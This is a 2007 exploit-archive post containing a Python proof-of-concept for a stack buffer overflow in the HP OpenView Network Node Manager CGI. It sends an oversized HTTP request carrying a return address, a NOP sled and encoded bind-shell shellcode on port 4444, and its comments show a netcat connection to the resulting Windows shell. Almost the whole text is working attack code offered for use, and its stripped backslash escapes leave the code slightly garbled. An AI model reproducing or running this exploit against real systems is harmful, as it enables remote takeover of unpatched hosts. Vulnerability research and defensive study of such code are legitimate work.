hpopen-overflow.txt
Posted on 13 December 2007
#!/usr/bin/python # HP OpenView Network Node Manager CGI Buffer Overflow # Tested on NNM Release B.07.50 / Windows 2000 server SP4 # http://www.zerodayinitiative.com/advisories/ZDI-07-071.html # Coded by Mati Aharoni # muts|offensive-security|com # http://www.offensive-security.com/0day/hpnnm.txt # Notes: # Vanilla stack based overflow # I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking # the entry point and injecting Sleep just before exe execution. This gave me enough # time to attach a debugger before program termination. If anyone knows how to properly # debug this, please tell me about it - there *must* be a better way... # # bt tools # ./sploit 192.168.1.105 # [+] Connecting to 192.168.1.105 # [+] Sending Evil Buffer to NNM CGI # [+] Payload Sent, ph33r. # # bt tools # nc -nv 192.168.1.105 4444 # (UNKNOWN) [192.168.1.105] 4444 (krb524) open # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:Program FilesHP OpenViewwwwcgi-bin> import socket import os import sys expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) print "[+] Connecting to "+sys.argv[1] expl.connect ( ( sys.argv[1], 80 ) ) print "[+] Sending Evil Buffer to NNM CGI " buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" buffer+="A"*5123 buffer+="x29x4cxe1x77" # JMP ESP user32.dll Win2kSP4 buffer+="x90"*32 # EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ buffer+=("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax68" "x58x30x41x31x50x41x42x6bx41x41x78x32x41x42x32x42" "x41x30x42x41x41x58x38x41x42x50x75x6bx59x39x6cx50" "x6ax78x6bx30x4dx49x78x38x79x59x6fx4bx4fx39x6fx71" "x70x6ex6bx50x6cx67x54x67x54x4cx4bx72x65x65x6cx4c" "x4bx41x6cx36x65x42x58x46x61x4ax4fx6cx4bx70x4fx64" "x58x4cx4bx73x6fx47x50x76x61x7ax4bx50x49x6cx4bx55" "x64x4ex6bx54x41x7ax4ex65x61x6fx30x6dx49x6cx6cx4e" "x64x4fx30x71x64x35x57x49x51x4ax6ax56x6dx63x31x5a" "x62x5ax4bx79x64x77x4bx61x44x57x54x45x78x63x45x78" "x65x6cx4bx33x6fx44x64x53x31x48x6bx41x76x4cx4bx54" "x4cx30x4bx6ex6bx43x6fx45x4cx66x61x78x6bx66x63x76" "x4cx4cx4bx6cx49x42x4cx71x34x65x4cx50x61x48x43x50" "x31x6bx6bx30x64x4cx4bx50x43x70x30x4ex6bx31x50x64" "x4cx6cx4bx74x30x47x6cx6ex4dx6ex6bx63x70x75x58x63" "x6ex62x48x4cx4ex50x4ex74x4ex5ax4cx50x50x4bx4fx4b" "x66x30x66x30x53x33x56x73x58x66x53x30x32x75x38x70" "x77x53x43x54x72x33x6fx76x34x6bx4fx6ex30x62x48x6a" "x6bx38x6dx49x6cx67x4bx50x50x4bx4fx48x56x61x4fx6c" "x49x38x65x65x36x4bx31x4ax4dx47x78x43x32x32x75x73" "x5ax64x42x79x6fx38x50x75x38x7ax79x46x69x7ax55x6c" "x6dx66x37x59x6fx6ex36x76x33x30x53x30x53x50x53x51" "x43x42x63x70x53x51x53x53x63x4bx4fx4ex30x33x56x62" "x48x54x51x53x6cx61x76x52x73x4ex69x5ax41x6ex75x75" "x38x4dx74x66x7ax34x30x6ax67x32x77x6bx4fx79x46x51" "x7ax46x70x51x41x70x55x4bx4fx38x50x53x58x4ex44x4c" "x6dx66x4ex78x69x33x67x49x6fx6ex36x50x53x31x45x6b" "x4fx5ax70x75x38x4dx35x42x69x6bx36x30x49x71x47x79" "x6fx59x46x56x30x50x54x70x54x30x55x79x6fx48x50x4f" "x63x52x48x7ax47x70x79x59x56x54x39x51x47x59x6fx58" "x56x50x55x79x6fx58x50x52x46x73x5ax61x74x63x56x33" "x58x65x33x52x4dx4dx59x4bx55x33x5ax70x50x56x39x44" "x69x6ax6cx4dx59x59x77x71x7ax67x34x4cx49x7ax42x54" "x71x4bx70x79x63x4cx6ax4bx4ex52x62x64x6dx49x6ex30" "x42x56x4cx4dx43x4cx4dx72x5ax77x48x6cx6bx4cx6bx6c" "x6bx32x48x31x62x49x6ex6fx43x77x66x6bx4fx50x75x51" "x54x6bx4fx7ax76x61x4bx72x77x66x32x70x51x36x31x33" "x61x53x5ax65x51x72x71x61x41x30x55x41x41x79x6fx48" "x50x32x48x6cx6dx6ex39x45x55x58x4ex61x43x69x6fx6a" "x76x53x5ax39x6fx4bx4fx46x57x69x6fx6ax70x4ex6bx73" "x67x49x6cx6dx53x49x54x70x64x6bx4fx4bx66x61x42x6b" "x4fx48x50x33x58x4ax4fx58x4ex6dx30x35x30x33x63x4b" "x4fx6bx66x79x6fx58x50x68") buffer+=" " expl.send (buffer) expl.close() print "[+] Payload Sent, ph33r."